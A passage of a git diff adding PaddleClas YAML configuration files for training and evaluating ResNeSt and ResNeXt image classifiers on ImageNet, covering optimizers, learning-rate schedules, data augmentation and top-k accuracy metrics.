0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50_fast_1s1x64d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50_fast_1s1x64d.yaml new file mode 100644 index 0000000..e761cc2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50_fast_1s1x64d.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeSt50_fast_1s1x64d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_32x4d.yaml new file mode 100644 index 0000000..4139308 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_64x4d.yaml new file mode 100644 index 0000000..b911f9d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00015 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_32x4d.yaml new file mode 100644 index 0000000..4ac6ab7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_64x4d.yaml new file mode 100644 index 0000000..1754e63 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_vd_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_32x4d.yaml new file mode 100644 index 0000000..29f807e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_64x4d.yaml new file mode 100644 index 0000000..94c91c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00018 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_32x4d.yaml new file mode 100644 index 0000000..5cfb972 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_64x4d.yaml new file mode 100644 index 0000000..a959073 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_vd_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_vd_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_32x4d.yaml new file mode 100644 index 0000000..2d81048 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_64x4d.yaml new file mode 100644 index 0000000..38fa51e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt50_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt50_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - 